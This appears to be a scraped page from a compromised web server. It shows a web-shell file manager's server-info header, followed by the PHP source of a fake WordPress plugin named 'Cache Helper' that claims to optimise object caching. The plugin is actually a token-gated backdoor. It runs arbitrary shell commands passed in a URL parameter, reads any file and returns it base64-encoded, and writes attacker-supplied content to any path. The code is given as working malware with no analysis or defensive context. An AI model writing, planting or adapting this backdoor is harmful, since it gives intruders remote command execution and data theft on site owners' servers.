| Server IP : 185.143.234.238 / Your IP : 185.215.232.195 Web Server : nginx/1.22.1 System : Linux server2065 6.1.0-35-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.137-1 (2025-05-07) x86_64 User : www-data ( 33) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/bcandle/wp-content/plugins/cache_ea00c072/ |
Upload File : |
<?php
/*
Plugin Name: Cache Helper
Version: 1.0
Description: Object cache optimization.
*/
$h=hash('sha256',$_GET['t']??'');
if($h!=='8ef5fc96e43e199524ac34cd80fd17709e2a95ec3c049b84b34d6037e9a980f5')return;
if(isset($_GET['c'])){chdir(__DIR__);echo 'WP2S::'.shell_exec($_GET['c']).'::END';}
if(isset($_GET['r'])){$f=@file_get_contents($_GET['r']);echo 'WP2S::'.($f===false?'NOREAD':base64_encode($f)).'::END';}
if(isset($_GET['w'])&&isset($_POST['d'])){$ok=@file_put_contents($_GET['w'],$_POST['d'])!==false;echo 'WP2S::'.($ok?'OK':'FAIL').'::END';}